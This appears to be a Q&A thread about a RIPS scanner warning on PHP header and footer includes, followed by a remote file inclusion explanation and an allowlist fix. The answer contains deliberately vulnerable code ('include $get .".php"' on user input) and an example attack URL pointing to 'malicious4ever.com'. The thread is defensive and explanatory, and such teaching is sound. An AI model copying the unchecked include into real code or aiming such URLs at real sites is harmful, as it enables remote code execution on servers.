How come a simple PHP include file be vulnerable

I have a header.php and a footer.php which I include into all other pages like home, contact, about us etc.

The way I included the header and the footer file is

<?php include 'inc/header.php';
// some code
// some code
include 'inc/footer.php'; ?>

Everything simple and works fine.

I decided to check my project for vulnerabilities and downloaded the RIPS scanner. After the scan, the result was:

Userinput reaches sensitive sink.

5: include include 'inc/header.php';  // header.php
requires:
     5: if(!in_array($_GET['file'], $files)) else

which basically says that both header and footer are vulnerable and I should use

if(!in_array($_GET['file'], $files)) else

How come a simple include header and footer file be vulnerable? And if vulnerable, how should I implement if(!in_array($_GET['file'], $files)) else ??

header.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
    <title></title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="icon" href="images/common/lbfavicon.ico" />
    <meta name="author" content="example.com" />
    <link rel="stylesheet" type="text/css" href="template/css/reset.css" media="screen" />
    <link rel="stylesheet" type="text/css" href="template/css/layout.css" media="screen"/>
</head>

<body>
    <div id="header-wrapper">
        <div class="container">
            <div id="nav">
                <ul>
                    <li><a href="./">Home</a></li>
                    <li><a href="index.php?page=about">About</a></li>
                    <li><a href="index.php?page=contact">Contact</a></li>
                </ul>
            </div><!-- nav ends -->
        </div><!-- container ends -->
    </div><!-- header wrapper ends -->

    <div id="header">
        <div class="container">
            <div id="logo">
                <a href="./"><img src="template/images/logo.png" width="125" height="45" alt="logo" /></a>
            </div><!-- logo ends -->
            <div id="search">
                <form method="get" action="searchresult.php">
                    <div class="form-item">
                       Search: <input  type="text" maxlength="120" name="searchfor" />
                    </div>
                </form>
            </div><!-- search ends -->
        </div><!-- container ends-->
    </div><!-- header ends -->

    <div class="container">
        <div id="announcement">
            <div id="breadcrumbs"></div>
        </div><!-- announcement ends -->
        <div id="pagewrapper">

Footer.php

        <div id="bottom">
            <div class="column">
                <h2>Abc.com</h2>
                    <ul>
                        <li><a href="about">About</a></li>
                        <li><a href="contact">Contact</a></li>
                    </ul>
            </div>

            <div class="column">
                <h2>Mode of payment</h2>
                    <ul>
                        <li>Credit/Debit card | Cheque | Demand draft</li>
                    </ul>
                <h2>Get in touch</h2>
                    <ul>
                        <li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
                    </ul>
            </div>

            <div class="column">
                <h2>Call us / Mail us</h2>
                    <ul>
                        <li>0-9999384745 / <a href="mailto:[email protected]">[email protected]</a></li>
                    </ul>
                <h2>Share us</h2>
                    <ul>
                        <li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
                    </ul>
            </div>

            <div style="clear: both;"></div>
        </div> <!-- bottom ends -->

        <div id="footer">

        </div>

        </div> <!--Pagewrapper end-->
    </div>    
</body>
</html>
Daksh B asked May 12 '15 13:05



1 Answer

Well, I suppose this is just a warning, but in a global way, when you include .php scripts whose names come from user input, you should absolutely check if the names provided are correct or not (to prevent security issues).

For example, a lot of websites use a "global" file that would include files according to requests coming from the user.

Example :

<?php

$get = $_GET['action'];
if ($get == "index") {
   include "includes/index.php";
}
//...
else
{
   include $get .".php";
}

Now let's imagine someone wants to include some malicious script within your website. If your server allows cross-website requests, then people could specify some external script that could be dangerous for your server or the other users.

Example : ./global.php?action=http://malicious4ever.com/dirtything

Cr3aHal0 answered Sep 27 '22 21:09
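One way to implement the in_array() check that RIPS suggests for a request-driven include like the one in the answer, as an added example that is not part of the original posts. The page names, the includes/ directory and the resolve_page() helper are assumptions; an include of a fixed string such as 'inc/header.php' contains no request data, so there is nothing in it to check.

```php
<?php
// Added example: allowlist check in front of a request-driven include.
// Page names, the includes/ directory and resolve_page() are assumptions.

/**
 * Return the file to include for a requested page name, or null when
 * the name is not on the allowlist.
 */
function resolve_page($requested): ?string
{
    // The only names that may ever reach include.
    $files = ['index', 'about', 'contact'];

    // Strict mode (third argument) compares type and value, so arrays
    // (?action[]=x), integers and look-alike strings never match.
    if (!in_array($requested, $files, true)) {
        return null;
    }

    // $requested is now known to be one of the literals above, so the
    // path is built from a fixed directory plus a known-good name.
    return 'includes/' . $requested . '.php';
}

// Constructed sample inputs. In the real script the value would come
// from the request, e.g. $_GET['action'] with 'index' as the default.
$samples = [
    'about',
    'http://malicious4ever.com/dirtything', // the URL from the answer
    'unknown',
    ['x'],                                  // array-typed parameter
];

foreach ($samples as $input) {
    $label = is_string($input) ? $input : gettype($input);
    $path  = resolve_page($input);

    if ($path === null) {
        // Real script: http_response_code(404); exit;
        echo $label . " -> rejected\n";
    } else {
        // Real script: include __DIR__ . '/' . $path;
        echo $label . " -> include " . $path . "\n";
    }
}
```

Only 'about' resolves to a path; the URL from the answer, the unknown name and the array are all rejected before include is reached.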